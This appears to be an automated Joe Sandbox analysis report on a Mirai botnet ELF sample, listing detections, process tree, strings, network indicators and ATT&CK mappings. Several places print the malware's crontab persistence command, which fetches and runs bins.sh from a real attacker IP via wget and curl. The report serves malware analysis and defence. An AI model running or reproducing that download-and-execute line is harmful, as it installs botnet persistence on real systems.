Edit tour

Linux Analysis Report
armv6l.elf

Overview

General Information

Sample name:armv6l.elf
Analysis ID:1646356
MD5:ea5f8b9926aee8b1547ebfb0fab259d3
SHA1:31f27c1784bba4550b8e4bcf3531de59653ddafe
SHA256:b75f76b138d62714efd89411f98f943952056da3635a32d30443730c0df87fea
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:72
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1646356
Start date and time:2025-03-23 23:03:22 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:armv6l.elf
Detection:MAL
Classification:mal72.troj.linELF@0/48@2/0
  • VT rate limit hit for: http://155.138.230.16/bins/bins.sh;
Command:/tmp/armv6l.elf
PID:5435
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • armv6l.elf (PID: 5435, Parent: 5358, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/armv6l.elf
    • armv6l.elf New Fork (PID: 5437, Parent: 5435)
      • sh (PID: 5453, Parent: 5437, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5459, Parent: 5453)
          • sh New Fork (PID: 5461, Parent: 5459)
          • crontab (PID: 5461, Parent: 5459, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5462, Parent: 5459)
          • chmod (PID: 5462, Parent: 5459, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5463, Parent: 5459)
          • sh (PID: 5463, Parent: 5459, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5464, Parent: 5459)
          • curl (PID: 5464, Parent: 5459, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
        • sh New Fork (PID: 5460, Parent: 5453)
        • crontab (PID: 5460, Parent: 5453, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
armv6l.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    5435.1.00007f0004017000.00007f000402b000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      5439.1.00007f0004017000.00007f000402b000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: armv6l.elfAvira: detected
        Source: armv6l.elfVirustotal: Detection: 31%Perma Link
        Source: armv6l.elfReversingLabs: Detection: 36%
        Source: armv6l.elfString: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv6l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetdt
        Source: armv6l.elfString: /bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
        Source: armv6l.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca

        Networking

        barindex
        Source: global trafficTCP traffic: 155.138.230.16 ports 1290,0,1,2,80,9
        Source: global trafficTCP traffic: 192.168.2.13:49950 -> 155.138.230.16:1290
        Source: /tmp/armv6l.elf (PID: 5435)Socket: 127.0.0.1:4161Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.13:45502 -> 155.138.230.16:80
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: api.znet.homes
        Source: armv6l.elfString found in binary or memory: http://155.138.230.16/bins/bins.sh;
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv6l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetdt
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/armv6l.elf (PID: 5439)SIGKILL sent: pid: 5439, result: unknownJump to behavior
        Source: classification engineClassification label: mal72.troj.linELF@0/48@2/0

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 5461)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
        Source: /bin/sh (PID: 5460)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
        Source: /bin/curl (PID: 5464)Directory: /root/.curlrcJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/230/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/5381/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/110/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/231/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/111/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/232/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/112/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/233/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/113/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/234/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/114/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/235/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/115/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/236/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/116/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/237/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/117/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/238/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/118/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/239/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/3630/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/119/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/914/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/10/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/917/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/11/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/12/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/13/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/14/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/15/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/5276/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/16/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/17/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/18/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/19/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/240/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/3095/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/120/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/241/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/121/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/242/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/1/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/122/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/243/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/2/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/123/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/244/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/3/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/124/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/245/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/1588/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/125/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/4/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/246/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/126/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/5/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/247/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/127/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/6/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/248/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/128/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/7/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/249/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/129/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/8/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/800/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/9/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/1906/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/802/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/803/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/20/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/21/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/22/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/23/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/24/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/25/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/26/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/27/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/28/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/29/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/3420/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/1482/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/490/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/1480/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/250/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/371/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/130/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/251/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/131/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/252/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/132/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/253/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/254/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/1238/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/134/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/255/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/256/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/257/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/378/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/3413/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/258/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/259/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/1475/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/936/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5449)File opened: /proc/30/statJump to behavior
        Source: /tmp/armv6l.elf (PID: 5453)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
        Source: /bin/sh (PID: 5462)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
        Source: /tmp/armv6l.elf (PID: 5450)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/armv6l.elf (PID: 5450)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/armv6l.elf (PID: 5435)Queries kernel information via 'uname': Jump to behavior
        Source: armv6l.elf, 5435.1.00007ffd65aa1000.00007ffd65ac2000.rw-.sdmp, armv6l.elf, 5439.1.00007ffd65aa1000.00007ffd65ac2000.rw-.sdmpBinary or memory string: ix86_64/usr/bin/qemu-arm/tmp/armv6l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv6l.elf
        Source: armv6l.elf, 5439.1.00007ffd65aa1000.00007ffd65ac2000.rw-.sdmpBinary or memory string: V[U/tmp/qemu-open.9tdtkv
        Source: armv6l.elf, 5439.1.00007ffd65aa1000.00007ffd65ac2000.rw-.sdmpBinary or memory string: /tmp/qemu-open.9tdtkv
        Source: armv6l.elf, 5435.1.0000555b5a7e4000.0000555b5a938000.rw-.sdmp, armv6l.elf, 5439.1.0000555b5a7e4000.0000555b5a938000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: armv6l.elf, 5435.1.00007ffd65aa1000.00007ffd65ac2000.rw-.sdmp, armv6l.elf, 5439.1.00007ffd65aa1000.00007ffd65ac2000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
        Source: armv6l.elf, 5435.1.0000555b5a7e4000.0000555b5a938000.rw-.sdmp, armv6l.elf, 5439.1.0000555b5a7e4000.0000555b5a938000.rw-.sdmpBinary or memory string: Z[U!/etc/qemu-binfmt/arm

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: armv6l.elf, type: SAMPLE
        Source: Yara matchFile source: 5435.1.00007f0004017000.00007f000402b000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5439.1.00007f0004017000.00007f000402b000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: armv6l.elf, type: SAMPLE
        Source: Yara matchFile source: 5435.1.00007f0004017000.00007f000402b000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5439.1.00007f0004017000.00007f000402b000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid Accounts1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Virtualization/Sandbox Evasion
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Standard Port
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job2
        Scripting
        Boot or Logon Initialization Scripts1
        File and Directory Permissions Modification
        LSASS Memory1
        Virtualization/Sandbox Evasion
        Remote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Hidden Files and Directories
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646356 Sample: armv6l.elf Startdate: 23/03/2025 Architecture: LINUX Score: 72 36 api.znet.homes 155.138.230.16, 1290, 80 AS-CHOOPAUS United States 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Mirai 2->42 44 Connects to many ports of the same IP (likely port scanning) 2->44 10 armv6l.elf 2->10         started        signatures3 process4 process5 12 armv6l.elf 10->12         started        process6 14 armv6l.elf sh 12->14         started        16 armv6l.elf 12->16         started        18 armv6l.elf 12->18         started        20 armv6l.elf 12->20         started        process7 22 sh 14->22         started        24 sh crontab 14->24         started        signatures8 27 sh crontab 22->27         started        30 sh chmod 22->30         started        32 sh sh 22->32         started        34 sh curl 22->34         started        46 Executes the "crontab" command typically for achieving persistence 24->46 process9 signatures10 48 Executes the "crontab" command typically for achieving persistence 27->48
        SourceDetectionScannerLabelLink
        armv6l.elf31%VirustotalBrowse
        armv6l.elf36%ReversingLabsLinux.Backdoor.Mirai
        armv6l.elf100%AviraEXP/ELF.Mirai.W
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://155.138.230.16/bins/bins.sh;100%Avira URL Cloudmalware

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        api.znet.homes
        155.138.230.16
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://155.138.230.16/bins/bins.sh;armv6l.elffalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          155.138.230.16
          api.znet.homesUnited States
          20473AS-CHOOPAUSfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          155.138.230.16i686.elfGet hashmaliciousMiraiBrowse
            mips.elfGet hashmaliciousMiraiBrowse
              mipsel.elfGet hashmaliciousMiraiBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                api.znet.homesi686.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                mips.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                mipsel.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AS-CHOOPAUSi686.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                mips.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                mipsel.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                Setup.exeGet hashmaliciousUnknownBrowse
                • 45.32.1.23
                xpmg.exeGet hashmaliciousUnknownBrowse
                • 155.138.150.12
                courtyardhealthcare.com.exeGet hashmaliciousUnknownBrowse
                • 139.180.160.173
                compited.ps1Get hashmaliciousUnknownBrowse
                • 139.180.160.173
                Nyx4r.mpsl.elfGet hashmaliciousOkiruBrowse
                • 44.168.169.166
                hoho.armv5l.elfGet hashmaliciousUnknownBrowse
                • 44.174.49.98
                yarn.elfGet hashmaliciousUnknownBrowse
                • 149.253.222.204
                No context
                No context
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Reputation:low
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Reputation:low
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Reputation:low
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Reputation:low
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Reputation:low
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Reputation:low
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Reputation:low
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:data
                Category:dropped
                Size (bytes):16
                Entropy (8bit):3.625
                Encrypted:false
